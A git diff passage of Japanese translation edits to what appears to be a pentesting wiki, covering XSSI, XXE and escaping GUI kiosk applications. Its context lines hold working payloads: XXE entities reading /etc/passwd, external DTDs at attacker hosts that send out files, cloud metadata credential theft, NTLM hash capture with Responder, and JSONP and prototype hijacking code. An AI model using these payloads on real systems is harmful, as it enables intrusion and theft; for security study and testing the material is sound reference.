-これらのタイプの XSSI 攻撃は、ユーザーのリクエストに応じて機密情報が動的にスクリプトに追加されることを含みます。検出は、クッキーありとなしでリクエストを送信し、レスポンスを比較することで行うことができます。情報が異なる場合、機密情報が存在する可能性を示すことがあります。このプロセスは、[DetectDynamicJS](https://github.com/luh2/DetectDynamicJS) Burp 拡張機能のようなツールを使用して自動化できます。
+これらのタイプのXSSI攻撃は、ユーザーのリクエストに応じて機密情報が動的にスクリプトに追加されることを含みます。検出は、クッキーありとなしでリクエストを送信し、レスポンスを比較することで行うことができます。情報が異なる場合、機密情報が存在する可能性を示すことがあります。このプロセスは、[DetectDynamicJS](https://github.com/luh2/DetectDynamicJS) Burp拡張機能のようなツールを使用して自動化できます。
 
-機密データがグローバル変数に保存されている場合、通常の XSSI で使用されるのと同様の方法を使用して悪用することができます。ただし、機密データが JSONP レスポンスに含まれている場合、攻撃者はコールバック関数をハイジャックして情報を取得することができます。これは、グローバルオブジェクトを操作するか、JSONP レスポンスによって実行される関数を設定することで行うことができます。以下に示します:
+機密データがグローバル変数に保存されている場合、通常のXSSIで使用されるのと同様の方法を使用して悪用することができます。ただし、機密データがJSONPレスポンスに含まれている場合、攻撃者はコールバック関数をハイジャックして情報を取得することができます。これは、グローバルオブジェクトを操作するか、JSONPレスポンスによって実行される関数を設定することで行うことができます。以下に示します:
 ```html
 <script>
 var angular = function () {
@@ -61,18 +61,18 @@ alert(JSON.stringify(leaked))
 </script>
 <script src="https://site.tld/p?jsonp=leak" type="text/javascript"></script>
 ```
-グローバル名前空間に存在しない変数に対して、_prototype tampering_ が時々悪用されることがあります。この技術は、呼び出されたプロパティを見つけるためにプロトタイプチェーンをたどるコード解釈を利用するJavaScriptの設計を活用します。`Array`の`slice`のような特定の関数をオーバーライドすることで、攻撃者は非グローバル変数にアクセスし、漏洩させることができます：
+グローバル名前空間に存在しない変数に対して、_prototype tampering_ が時々悪用されることがあります。この技術は、呼び出されたプロパティを見つけるためにプロトタイプチェーンをたどるコード解釈を含むJavaScriptの設計を利用します。`Array`の`slice`のような特定の関数をオーバーライドすることで、攻撃者は非グローバル変数にアクセスし、漏洩させることができます：
 ```javascript
 Array.prototype.slice = function () {
 // leaks ["secret1", "secret2", "secret3"]
 sendToAttackerBackend(this)
 }
 ```
-攻撃ベクターに関する詳細は、セキュリティ研究者 [Sebastian Lekies](https://twitter.com/slekies) の研究に見られ、彼は [ベクター](http://sebastian-lekies.de/leak/) のリストを維持しています。
+攻撃ベクターに関する詳細は、セキュリティ研究者 [Sebastian Lekies](https://twitter.com/slekies) の研究に見られ、彼は [vectors](http://sebastian-lekies.de/leak/) のリストを維持しています。
 
 ### Non-Script-XSSI
 
-寺田武の研究は、CSVなどのNon-Scriptファイルが`script`タグのソースとして含まれることによって、クロスオリジンで漏洩する別の形のXSSIを紹介しています。2006年のジェレミア・グロスマンによる完全なGoogleアドレス帳を読み取る攻撃や、2007年のジョー・ウォーカーによるJSONデータ漏洩など、XSSIの歴史的な事例は、これらの脅威の深刻さを浮き彫りにしています。さらに、ギャレス・ヘイズは、特定のブラウザで効果的なJSON形式を逃れるためにUTF-7エンコードされたJSONを使用してスクリプトを実行する攻撃のバリアントについて説明しています。
+寺田武の研究は、CSVなどのNon-Scriptファイルが`script`タグのソースとして含まれることによって、クロスオリジンで漏洩する別の形のXSSIを紹介しています。2006年のジェレミア・グロスマンによる完全なGoogleアドレス帳を読み取る攻撃や、2007年のジョー・ウォーカーによるJSONデータ漏洩など、XSSIの歴史的な事例は、これらの脅威の深刻さを浮き彫りにしています。さらに、ギャレス・ヘイズは、特定のブラウザで効果的なJSON形式から脱出し、スクリプトを実行するためにUTF-7エンコードされたJSONを使用する攻撃のバリアントについて説明しています。
 ```javascript
 ;[
 {
diff --git a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md
index b8834d603..d4ae33024 100644
--- a/src/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/src/pentesting-web/xxe-xee-xml-external-entity.md
@@ -4,12 +4,12 @@
 
 ## XMLの基本
 
-XMLはデータの保存と輸送のために設計されたマークアップ言語であり、記述的に名前付けされたタグを使用する柔軟な構造を特徴としています。XMLは、あらかじめ定義されたタグのセットに制限されない点でHTMLとは異なります。JSONの台頭に伴い、XMLの重要性は低下していますが、当初はAJAX技術において重要な役割を果たしていました。
+XMLはデータの保存と輸送のために設計されたマークアップ言語で、記述的に名前付けされたタグを使用する柔軟な構造を特徴としています。XMLは、あらかじめ定義されたタグのセットに制限されない点でHTMLとは異なります。JSONの台頭に伴い、XMLの重要性は低下していますが、当初はAJAX技術において重要な役割を果たしていました。
 
-- **エンティティによるデータ表現**: XMLのエンティティは、`&lt;`や`&gt;`のような特殊文字を含むデータの表現を可能にし、これらはそれぞれ`<`と`>`に対応してXMLのタグシステムとの衝突を避けます。
-- **XML要素の定義**: XMLは要素の型を定義することを可能にし、要素がどのように構造化され、どのような内容を含むことができるかを概説します。内容の種類は任意のタイプから特定の子要素までさまざまです。
+- **エンティティによるデータ表現**: XMLのエンティティは、`&lt;`や`&gt;`のような特殊文字を含むデータの表現を可能にし、これらはそれぞれ`<`と`>`に対応し、XMLのタグシステムとの衝突を避けます。
+- **XML要素の定義**: XMLは要素の型を定義することを可能にし、要素がどのように構造化され、どのような内容を含むことができるかを概説します。内容の種類から特定の子要素まで、さまざまな内容を含むことができます。
 - **文書型定義 (DTD)**: DTDはXMLにおいて文書の構造と含むことができるデータの型を定義するために重要です。DTDは内部、外部、またはその組み合わせであり、文書のフォーマットと検証方法をガイドします。
-- **カスタムおよび外部エンティティ**: XMLは、柔軟なデータ表現のためにDTD内でカスタムエンティティの作成をサポートします。URLで定義された外部エンティティは、特にXML外部エンティティ（XXE）攻撃の文脈においてセキュリティ上の懸念を引き起こします。これは、XMLパーサーが外部データソースを処理する方法を悪用します: `<!DOCTYPE foo [ <!ENTITY myentity "value" > ]>`
+- **カスタムおよび外部エンティティ**: XMLは、柔軟なデータ表現のためにDTD内でカスタムエンティティの作成をサポートします。URLで定義された外部エンティティは、特にXML外部エンティティ（XXE）攻撃の文脈でセキュリティ上の懸念を引き起こします。これは、XMLパーサーが外部データソースを処理する方法を悪用します: `<!DOCTYPE foo [ <!ENTITY myentity "value" > ]>`
 - **パラメータエンティティによるXXE検出**: 特に従来の方法がパーサーのセキュリティ対策により失敗する場合、XXE脆弱性を検出するためにXMLパラメータエンティティを利用できます。これらのエンティティは、DNSルックアップや制御されたドメインへのHTTPリクエストをトリガーするなどのアウトオブバンド検出技術を可能にし、脆弱性を確認します。
 - `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>`
 - `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>`
@@ -43,7 +43,7 @@ XMLはデータの保存と輸送のために設計されたマークアップ
 ```
 ![](<../images/image (86).png>)
 
-この2番目のケースは、ウェブサーバーがPHPを使用している場合にファイルを抽出するのに役立ちます（Portswiggersラボの場合ではありません）。
+この2番目のケースは、ウェブサーバーがPHPを使用している場合にファイルを抽出するのに役立ちます（Portswiggerのラボではない）。
 ```xml
 <!--?xml version="1.0" ?-->
 <!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
@@ -65,7 +65,7 @@ XMLはデータの保存と輸送のために設計されたマークアップ
 
 ### ディレクトリリスト
 
-**Java** ベースのアプリケーションでは、XXEを使用して **ディレクトリの内容をリストする** ことが可能な場合があります。ペイロードは次のようになります（ファイルの代わりにディレクトリを要求するだけです）：
+**Java** ベースのアプリケーションでは、XXEを使用してペイロードのように（ファイルではなくディレクトリを要求することで）**ディレクトリの内容をリストする**ことが可能な場合があります：
 ```xml
 <!-- Root / -->
 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>
@@ -75,7 +75,7 @@ XMLはデータの保存と輸送のために設計されたマークアップ
 ```
 ### SSRF
 
-XXEを使用して、クラウド内のSSRFを悪用することができます。
+XXEは、クラウド内のSSRFを悪用するために使用される可能性があります。
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
@@ -83,7 +83,7 @@ XXEを使用して、クラウド内のSSRFを悪用することができます
 ```
 ### Blind SSRF
 
-**以前にコメントされた技術**を使用すると、サーバーがあなたが制御するサーバーにアクセスしていることを示すことができますが、うまくいかない場合は、**XMLエンティティが許可されていない**可能性があります。その場合は、**XMLパラメータエンティティ**を使用してみることができます：
+**以前にコメントされた技術**を使用すると、サーバーがあなたが制御するサーバーにアクセスしていることを示すことができます。それが機能しない場合、**XMLエンティティが許可されていない**可能性があります。その場合は、**XMLパラメーターエンティティ**を使用してみることができます：
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://gtd8nhwxylcik0mt2dgvpeapkgq7ew.burpcollaborator.net"> %xxe; ]>
@@ -91,7 +91,7 @@ XXEを使用して、クラウド内のSSRFを悪用することができます
 ```
 ### "Blind" SSRF - 外部帯域外でデータを抽出する
 
-**この場合、サーバーに悪意のあるペイロードを含む新しいDTDを読み込ませ、ファイルの内容をHTTPリクエストを介して送信させます（複数行のファイルの場合、例えばこの基本サーバーを使用して\_ftp://**\_経由で抽出を試みることができます[**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**）。この説明は** [**Portswiggers lab here**](https://portswigger.net/web-security/xxe/blind)**に基づいています。**
+**この場合、サーバーに悪意のあるペイロードを含む新しいDTDを読み込ませ、ファイルの内容をHTTPリクエストで送信させます（複数行のファイルの場合、例えばこの基本サーバーを使用して\_ftp://**\_経由で抽出を試みることができます[**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**）。この説明は** [**Portswiggers lab here**](https://portswigger.net/web-security/xxe/blind)**に基づいています。**
 
 与えられた悪意のあるDTDでは、データを抽出するために一連の手順が実行されます：
 
@@ -121,18 +121,18 @@ XXEを使用して、クラウド内のSSRFを悪用することができます
 <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
 <stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
 ```
-このペイロードは、XMLパラメータエンティティ`%xxe`を定義し、それをDTD内に組み込みます。XMLパーサーによって処理されると、このペイロードは攻撃者のサーバーから外部DTDを取得します。パーサーはその後、DTDをインラインで解釈し、悪意のあるDTDに記載された手順を実行し、`/etc/hostname`ファイルを攻撃者のサーバーに流出させます。
+このペイロードは、XMLパラメータエンティティ `%xxe` を定義し、それをDTD内に組み込みます。XMLパーサーによって処理されると、このペイロードは攻撃者のサーバーから外部DTDを取得します。パーサーはその後、DTDをインラインで解釈し、悪意のあるDTDに記載された手順を実行し、`/etc/hostname` ファイルを攻撃者のサーバーに流出させます。
 
 ### エラーベース（外部DTD）
 
-**この場合、サーバーが悪意のあるDTDを読み込むようにし、エラーメッセージ内にファイルの内容を表示させます（これはエラーメッセージが見える場合にのみ有効です）。** [**ここからの例。**](https://portswigger.net/web-security/xxe/blind)
+**この場合、サーバーがファイルの内容をエラーメッセージ内に表示する悪意のあるDTDを読み込むようにします（これはエラーメッセージが見える場合にのみ有効です）。** [**ここからの例。**](https://portswigger.net/web-security/xxe/blind)
 
-悪意のある外部文書型定義（DTD）を使用して、`/etc/passwd`ファイルの内容を明らかにするXML解析エラーメッセージをトリガーできます。これは以下の手順で実現されます：
+悪意のある外部文書型定義（DTD）を使用して、`/etc/passwd` ファイルの内容を明らかにするXML解析エラーメッセージをトリガーできます。これは以下の手順で実現されます：
 
-1. `file`という名前のXMLパラメータエンティティが定義され、`/etc/passwd`ファイルの内容が含まれます。
-2. `eval`という名前のXMLパラメータエンティティが定義され、`error`という別のXMLパラメータエンティティの動的宣言を組み込みます。この`error`エンティティは評価されると、存在しないファイルを読み込もうとし、その名前として`file`エンティティの内容を組み込みます。
-3. `eval`エンティティが呼び出され、`error`エンティティの動的宣言が行われます。
-4. `error`エンティティの呼び出しは、存在しないファイルを読み込もうとし、`/etc/passwd`ファイルの内容をファイル名の一部として含むエラーメッセージを生成します。
+1. `file` という名前のXMLパラメータエンティティが定義され、`/etc/passwd` ファイルの内容が含まれます。
+2. `eval` という名前のXMLパラメータエンティティが定義され、`error` という別のXMLパラメータエンティティの動的宣言を組み込みます。この `error` エンティティは評価されると、存在しないファイルを読み込もうとし、その名前として `file` エンティティの内容を組み込みます。
+3. `eval` エンティティが呼び出され、`error` エンティティの動的宣言が行われます。
+4. `error` エンティティの呼び出しは、存在しないファイルを読み込もうとし、`/etc/passwd` ファイルの内容をファイル名の一部として含むエラーメッセージを生成します。
 
 悪意のある外部DTDは、以下のXMLで呼び出すことができます：
 ```xml
@@ -148,9 +148,9 @@ _**外部DTDは、1つのエンティティを2番目のエンティティの中
 
 ### **エラーに基づく（システムDTD）**
 
-では、**アウトオブバンドの相互作用がブロックされている**場合の盲目的なXXE脆弱性はどうでしょうか？
+では、**アウトオブバンドの相互作用がブロックされている**場合の盲目的なXXE脆弱性はどうでしょうか？ 
 
-XML言語仕様の抜け穴は、**文書のDTDが内部および外部の宣言を混合する際にエラーメッセージを通じて機密データを露出させることができます**。この問題は、外部DTDで宣言されたエンティティの内部再定義を可能にし、エラーに基づくXXE攻撃の実行を促進します。このような攻撃は、外部DTDで元々宣言されたXMLパラメータエンティティの再定義を利用します。サーバーによってアウトオブバンド接続がブロックされている場合、攻撃者は攻撃を実行するためにローカルDTDファイルに依存し、機密情報を明らかにするために解析エラーを引き起こすことを目指します。
+XML言語仕様の抜け穴は、**ドキュメントのDTDが内部および外部宣言を混合する際にエラーメッセージを通じて機密データを露出させることができます**。この問題は、外部で宣言されたエンティティの内部再定義を可能にし、エラーに基づくXXE攻撃の実行を促進します。このような攻撃は、外部DTDで元々宣言されたXMLパラメータエンティティの再定義を利用します。サーバーによってアウトオブバンド接続がブロックされている場合、攻撃者は攻撃を実行するためにローカルDTDファイルに依存し、機密情報を明らかにするために解析エラーを引き起こすことを目指します。
 
 サーバーのファイルシステムに`/usr/local/app/schema.dtd`にDTDファイルが含まれており、`custom_entity`というエンティティを定義しているシナリオを考えてみましょう。攻撃者は、次のようにハイブリッドDTDを提出することで、`/etc/passwd`ファイルの内容を明らかにするXML解析エラーを引き起こすことができます。
 ```xml
@@ -203,7 +203,7 @@ XML言語仕様の抜け穴は、**文書のDTDが内部および外部の宣言
 
 {% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %}
 
-さらに、**被害者システムのDockerイメージ**がある場合は、同じリポジトリのツールを使用して、**イメージ**を**スキャン**し、システム内に存在する**DTDのパス**を**見つける**ことができます。方法を学ぶには、[GitHubのReadme](https://github.com/GoSecure/dtd-finder)をお読みください。
+さらに、**被害者システムのDockerイメージ**を持っている場合は、同じリポジトリのツールを使用して、**イメージ**を**スキャン**し、システム内に存在する**DTDのパス**を**見つける**ことができます。方法については、[GitHubのReadme](https://github.com/GoSecure/dtd-finder)をお読みください。
 ```bash
 java -jar dtd-finder-1.2-SNAPSHOT-all.jar /tmp/dadocker.tar
 
@@ -219,21 +219,21 @@ Testing 0 entities : []
 
 この攻撃の詳細な説明については、**[**この素晴らしい投稿**](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/) **の第二セクションを確認してください**。
 
-**Microsoft Office文書のアップロード機能は多くのウェブアプリケーションで提供されており**、これらの文書から特定の詳細を抽出します。たとえば、ウェブアプリケーションはユーザーがXLSX形式のスプレッドシートをアップロードすることでデータをインポートすることを許可する場合があります。パーサーがスプレッドシートからデータを抽出するためには、必然的に少なくとも1つのXMLファイルを解析する必要があります。
+**Microsoft Office ドキュメントのアップロード機能は多くのウェブアプリケーションで提供されており**、これらのドキュメントから特定の詳細を抽出します。たとえば、ウェブアプリケーションはユーザーが XLSX 形式のスプレッドシートをアップロードすることでデータをインポートすることを許可する場合があります。パーサーがスプレッドシートからデータを抽出するためには、必然的に少なくとも1つのXMLファイルを解析する必要があります。
 
-この脆弱性をテストするには、**XXEペイロードを含むMicrosoft Officeファイルを作成する必要があります**。最初のステップは、文書を解凍できる空のディレクトリを作成することです。
+この脆弱性をテストするには、**XXEペイロードを含むMicrosoft Officeファイルを作成する必要があります**。最初のステップは、ドキュメントを解凍できる空のディレクトリを作成することです。
 
-文書が解凍されたら、`./unzipped/word/document.xml`にあるXMLファイルを開き、好みのテキストエディタ（例えばvim）で編集します。XMLは、HTTPリクエストで始まることが多い希望するXXEペイロードを含むように修正する必要があります。
+ドキュメントが解凍されたら、`./unzipped/word/document.xml` にあるXMLファイルを開き、好みのテキストエディタ（例えばvim）で編集します。XMLは、通常HTTPリクエストで始まる希望するXXEペイロードを含むように修正する必要があります。
 
 修正されたXML行は、2つのルートXMLオブジェクトの間に挿入する必要があります。リクエスト用のモニタ可能なURLにURLを置き換えることが重要です。
 
-最後に、ファイルを圧縮して悪意のあるpoc.docxファイルを作成できます。以前に作成した「unzipped」ディレクトリから、次のコマンドを実行する必要があります：
+最後に、ファイルを圧縮して悪意のある poc.docx ファイルを作成できます。以前に作成した「unzipped」ディレクトリから、次のコマンドを実行する必要があります：
 
-作成したファイルを潜在的に脆弱なウェブアプリケーションにアップロードでき、Burp Collaboratorのログにリクエストが表示されることを期待できます。
+作成したファイルは、潜在的に脆弱なウェブアプリケーションにアップロードでき、Burp Collaborator のログにリクエストが表示されることを期待できます。
 
 ### Jar: protocol
 
-**jar**プロトコルは**Javaアプリケーション**内でのみアクセス可能です。これは、**PKZIP**アーカイブ（例：`.zip`、`.jar`など）内のファイルアクセスを可能にするように設計されており、ローカルおよびリモートファイルの両方に対応しています。
+**jar** プロトコルは、**Javaアプリケーション**内でのみアクセス可能です。これは、**PKZIP** アーカイブ（例：`.zip`、`.jar` など）内のファイルアクセスを可能にするように設計されており、ローカルファイルとリモートファイルの両方に対応しています。
 ```
 jar:file:///var/myarchive.zip!/file.txt
 jar:https://download.host.com/myarchive.zip!/file.txt
@@ -249,13 +249,13 @@ PKZIPアーカイブ内のファイルにjarプロトコルを介してアクセ
 4. アーカイブ内の特定のファイル`file.zip`が読み取られます。
 5. 操作後、このプロセス中に作成された一時ファイルは削除されます。
 
-このプロセスの2番目のステップで中断するための興味深い技術は、アーカイブファイルを提供する際にサーバー接続を無期限に開いたままにすることです。この目的のために、[このリポジトリ](https://github.com/GoSecure/xxe-workshop/tree/master/24_write_xxe/solution)で利用可能なツールを使用できます。これには、Pythonサーバー（`slow_http_server.py`）やJavaサーバー（`slowserver.jar`）が含まれます。
+このプロセスの2番目のステップで中断するための興味深い技術は、アーカイブファイルを提供する際にサーバー接続を無期限に開いたままにすることです。この目的のために、[このリポジトリ](https://github.com/GoSecure/xxe-workshop/tree/master/24_write_xxe/solution)で利用可能なツールには、Pythonサーバー（`slow_http_server.py`）やJavaサーバー（`slowserver.jar`）が含まれます。
 ```xml
 <!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:http://attacker.com:8080/evil.zip!/evil.dtd">]>
 <foo>&xxe;</foo>
 ```
 > [!CAUTION]
-> 一時ディレクトリにファイルを書くことは、**パストラバーサルに関わる別の脆弱性をエスカレートするのに役立つ**（ローカルファイルインクルード、テンプレートインジェクション、XSLT RCE、デシリアライズなど）。
+> 一時ディレクトリにファイルを書き込むことは、**パストラバーサルに関わる別の脆弱性をエスカレートするのに役立つ**（ローカルファイルインクルード、テンプレートインジェクション、XSLT RCE、デシリアライズなど）。
 
 ### XSS
 ```xml
@@ -292,11 +292,11 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
 
 #### NTMLの取得
 
-Windowsホストでは、responder.pyハンドラーを設定することで、ウェブサーバーユーザーのNTMLハッシュを取得することが可能です:
+Windowsホストでは、responder.pyハンドラーを設定することでウェブサーバーユーザーのNTMLハッシュを取得することが可能です:
 ```bash
 Responder.py -I eth0 -v
 ```
-次のリクエストを送信することによって
+以下のリクエストを送信することによって
 ```xml
 <!--?xml version="1.0" ?-->
 <!DOCTYPE foo [<!ENTITY example SYSTEM 'file://///attackerIp//randomDir/random.jpg'> ]>
@@ -308,7 +308,7 @@ Responder.py -I eth0 -v
 
 ### XInclude
 
-クライアントデータをサーバー側のXMLドキュメントに統合する際、バックエンドのSOAPリクエストのように、XML構造に対する直接的な制御はしばしば制限され、`DOCTYPE`要素を変更する制限のために従来のXXE攻撃が妨げられます。しかし、`XInclude`攻撃は、XMLドキュメントの任意のデータ要素内に外部エンティティを挿入することを可能にすることで解決策を提供します。この方法は、サーバー生成のXMLドキュメント内のデータの一部のみを制御できる場合でも効果的です。
+クライアントデータをサーバー側のXMLドキュメントに統合する際、バックエンドのSOAPリクエストのように、XML構造に対する直接的な制御はしばしば制限され、`DOCTYPE`要素を変更する制限により従来のXXE攻撃が妨げられます。しかし、`XInclude`攻撃は、XMLドキュメントの任意のデータ要素内に外部エンティティを挿入することを可能にすることで解決策を提供します。この方法は、サーバー生成のXMLドキュメント内のデータの一部のみを制御できる場合でも効果的です。
 
 `XInclude`攻撃を実行するには、`XInclude`名前空間を宣言し、意図した外部エンティティのファイルパスを指定する必要があります。以下は、そのような攻撃がどのように構成されるかの簡潔な例です：
 ```xml
@@ -318,9 +318,9 @@ Check [https://portswigger.net/web-security/xxe](https://portswigger.net/web-sec
 
 ### SVG - ファイルアップロード
 
-ユーザーが特定のアプリケーションにアップロードしたファイルは、サーバーで処理される際に、XMLまたはXMLを含むファイル形式の取り扱いにおける脆弱性を悪用する可能性があります。一般的なファイル形式であるオフィス文書（DOCX）や画像（SVG）は、XMLに基づいています。
+ユーザーが特定のアプリケーションにアップロードしたファイルは、サーバーで処理される際に、XMLまたはXMLを含むファイル形式の取り扱いにおける脆弱性を悪用することがあります。一般的なファイル形式であるオフィス文書（DOCX）や画像（SVG）は、XMLに基づいています。
 
-ユーザーが**画像をアップロード**すると、これらの画像はサーバー側で処理または検証されます。PNGやJPEGなどの形式を期待するアプリケーションであっても、**サーバーの画像処理ライブラリはSVG画像もサポートしている可能性があります**。XMLベースの形式であるSVGは、攻撃者によって悪意のあるSVG画像を提出するために悪用され、サーバーがXXE（XML外部エンティティ）脆弱性にさらされる可能性があります。
+ユーザーが**画像をアップロード**すると、これらの画像はサーバー側で処理または検証されます。PNGやJPEGなどの形式を期待するアプリケーションであっても、**サーバーの画像処理ライブラリはSVG画像もサポートしている可能性があります**。XMLベースの形式であるSVGは、攻撃者によって悪意のあるSVG画像を提出するために悪用され、サーバーをXXE（XML外部エンティティ）脆弱性にさらすことができます。
 
 以下にそのような攻撃の例を示します。悪意のあるSVG画像がシステムファイルを読み取ろうとしています：
 ```xml
@@ -514,7 +514,7 @@ Content-Type: application/x-xliff+xml
 ```
 このアプローチは、User AgentがJava 1.8の使用を示していることを明らかにします。このバージョンのJavaの制限の一つは、Out of Band技術を使用して、/etc/passwdのような改行文字を含むファイルを取得できないことです。
 
-Error-Based Data Exfiltration この制限を克服するために、Error-Basedアプローチが採用されます。DTDファイルは、ターゲットファイルからのデータを含むエラーをトリガーするように次のように構成されています：
+Error-Based Data Exfiltration この制限を克服するために、Error-Basedアプローチが採用されます。DTDファイルは、ターゲットファイルからのデータを含むエラーをトリガーするように次のように構成されています:
 ```xml
 <!ENTITY % data SYSTEM "file:///etc/passwd">
 <!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/'>">
@@ -532,7 +532,7 @@ Error-Based Data Exfiltration この制限を克服するために、Error-Based
 %foo;
 %xxe;
 ```
-この変更により、HTTP経由で送信されるエラー出力に反映されるファイルの内容の成功した抽出が行われます。これは、機密情報を抽出するためにOut of BandおよびError-Based技術の両方を利用した成功したXXE（XML External Entity）攻撃を示しています。
+この変更により、HTTP経由で送信されるエラー出力に反映されるファイルの内容が正常に抽出されます。これは、機密情報を抽出するためにOut of BandおよびError-Based技術の両方を利用した成功したXXE（XML External Entity）攻撃を示しています。
 
 ## RSS - XEE
 
diff --git a/src/physical-attacks/escaping-from-gui-applications/README.md b/src/physical-attacks/escaping-from-gui-applications/README.md
index fbf783cae..5ad080878 100644
--- a/src/physical-attacks/escaping-from-gui-applications/README.md
+++ b/src/physical-attacks/escaping-from-gui-applications/README.md
@@ -1,6 +1,6 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-# GUIアプリケーション内での可能なアクションを確認する
+# GUIアプリケーション内の可能なアクションを確認する
 
 **一般的なダイアログ**は、**ファイルの保存**、**ファイルのオープン**、フォントや色の選択などのオプションです。これらのほとんどは**完全なエクスプローラー機能**を提供します。つまり、これらのオプションにアクセスできれば、エクスプローラーの機能にアクセスできるということです：
 
@@ -24,24 +24,24 @@
 
 ### Windows
 
-例えば、_cmd.exe、command.com、Powershell/Powershell ISE、mmc.exe、at.exe、taskschd.msc..._ ここでコマンドを実行するために使用できるバイナリをさらに見つけてください: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
+例えば、_cmd.exe、command.com、Powershell/Powershell ISE、mmc.exe、at.exe、taskschd.msc..._ ここでコマンドを実行するために使用できるバイナリをさらに見つけてください：[https://lolbas-project.github.io/](https://lolbas-project.github.io)
 
 ### \*NIX \_\_
 
-_bash、sh、zsh..._ さらにこちら: [https://gtfobins.github.io/](https://gtfobins.github.io)
+_bash、sh、zsh..._ さらにこちらを参照してください：[https://gtfobins.github.io/](https://gtfobins.github.io)
 
 # Windows
 
 ## パス制限の回避
 
-- **環境変数**: いくつかのパスを指している環境変数がたくさんあります
-- **他のプロトコル**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
+- **環境変数**：いくつかのパスを指している環境変数がたくさんあります
+- **他のプロトコル**：_about:、data:、ftp:、file:、mailto:、news:、res:、telnet:、view-source:_
 - **シンボリックリンク**
-- **ショートカット**: CTRL+N (新しいセッションを開く)、CTRL+R (コマンドを実行)、CTRL+SHIFT+ESC (タスクマネージャ)、Windows+E (エクスプローラーを開く)、CTRL-B、CTRL-I (お気に入り)、CTRL-H (履歴)、CTRL-L、CTRL-O (ファイル/オープンダイアログ)、CTRL-P (印刷ダイアログ)、CTRL-S (名前を付けて保存)
-- 隠し管理メニュー: CTRL-ALT-F8、CTRL-ESC-F9
-- **シェルURI**: _shell:Administrative Tools、shell:DocumentsLibrary、shell:Librariesshell:UserProfiles、shell:Personal、shell:SearchHomeFolder、shell:Systemshell:NetworkPlacesFolder、shell:SendTo、shell:UsersProfiles、shell:Common Administrative Tools、shell:MyComputerFolder、shell:InternetFolder_
-- **UNCパス**: 共有フォルダに接続するためのパス。ローカルマシンのC$に接続を試みるべきです ("\\\127.0.0.1\c$\Windows\System32")
-- **その他のUNCパス:**
+- **ショートカット**：CTRL+N（新しいセッションを開く）、CTRL+R（コマンドを実行）、CTRL+SHIFT+ESC（タスクマネージャー）、Windows+E（エクスプローラーを開く）、CTRL-B、CTRL-I（お気に入り）、CTRL-H（履歴）、CTRL-L、CTRL-O（ファイル/オープンダイアログ）、CTRL-P（印刷ダイアログ）、CTRL-S（名前を付けて保存）
+- 隠し管理メニュー：CTRL-ALT-F8、CTRL-ESC-F9
+- **シェルURI**：_shell:Administrative Tools、shell:DocumentsLibrary、shell:Librariesshell:UserProfiles、shell:Personal、shell:SearchHomeFolder、shell:Systemshell:NetworkPlacesFolder、shell:SendTo、shell:UsersProfiles、shell:Common Administrative Tools、shell:MyComputerFolder、shell:InternetFolder_
+- **UNCパス**：共有フォルダーに接続するためのパス。ローカルマシンのC$に接続を試みるべきです（"\\\127.0.0.1\c$\Windows\System32"）
+- **その他のUNCパス：**
 
 | UNC                       | UNC            | UNC                  |
 | ------------------------- | -------------- | -------------------- |
@@ -78,8 +78,8 @@ Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](
 - スティッキーキー – SHIFTを5回押す
 - マウスキー – SHIFT+ALT+NUMLOCK
 - ハイコントラスト – SHIFT+ALT+PRINTSCN
-- トグルキー – NUMLOCKを5秒間保持
-- フィルターキー – 右SHIFTを12秒間保持
+- トグルキー – NUMLOCKを5秒間保持する
+- フィルターキー – 右SHIFTを12秒間保持する
 - WINDOWS+F1 – Windows検索
 - WINDOWS+D – デスクトップを表示
 - WINDOWS+E – Windowsエクスプローラーを起動
@@ -87,7 +87,7 @@ Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](
 - WINDOWS+U – アクセシビリティセンター
 - WINDOWS+F – 検索
 - SHIFT+F10 – コンテキストメニュー
-- CTRL+SHIFT+ESC – タスクマネージャ
+- CTRL+SHIFT+ESC – タスクマネージャー
 - CTRL+ALT+DEL – 新しいWindowsバージョンでのスプラッシュスクリーン
 - F1 – ヘルプ F3 – 検索
 - F6 – アドレスバー
@@ -113,7 +113,7 @@ Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](
 
 ### シェルプロトコル
 
-エクスプローラーのビューを取得するためにこのURLを入力します：
+エクスプローラー表示を取得するためにこのURLを入力します：
 
 - `shell:Administrative Tools`
 - `shell:DocumentsLibrary`
@@ -139,47 +139,47 @@ Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](
 
 ## ファイル拡張子を表示する
 
-詳細についてはこのページを確認してください: [https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
